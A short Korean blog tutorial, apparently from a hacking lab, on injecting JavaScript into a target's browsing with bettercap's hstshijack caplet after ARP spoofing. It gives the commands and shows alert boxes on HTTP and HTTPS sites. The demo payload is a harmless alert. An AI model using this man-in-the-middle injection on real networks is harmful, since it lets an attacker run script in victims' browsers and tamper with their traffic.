텍스트 편집기를 열고
alert('javascript test'); 입력하기, 루트 폴더에 alert.js라고 저장하자
hstshijack에서 hstshijack.cap을 열고 payloads 끝에
,*:/root/alert.js입력하기
터미널로 돌아와
$bettercap -iface eth0 -caplet /root/spoof.cap
$hstshijack/jstshijack
이제 타깃으로 가서 인터넷 검색 기록을 지운다. ctrl + shift + delete
http 페이지에서 시도해보자
vulnweb.com으로 들어가면 alert가 뜬다.
https는
stackoverflow.com에서 한다., 아니면 linkedin.com에서 시도하자
google.ie로 들어가면 alert가 뜬다.
facebook에서도 경고가 뜬다.
'해킹' 카테고리의 다른 글
| 해킹 방어 (1) | 2024.01.19 |
|---|---|
| 가짜 엑세스 포인트 만들기 (0) | 2024.01.19 |
| DNS 스푸핑 (0) | 2024.01.18 |
| HSTS 우회하기 (0) | 2024.01.16 |
| HTTPS 우회하기 (1) | 2024.01.16 |
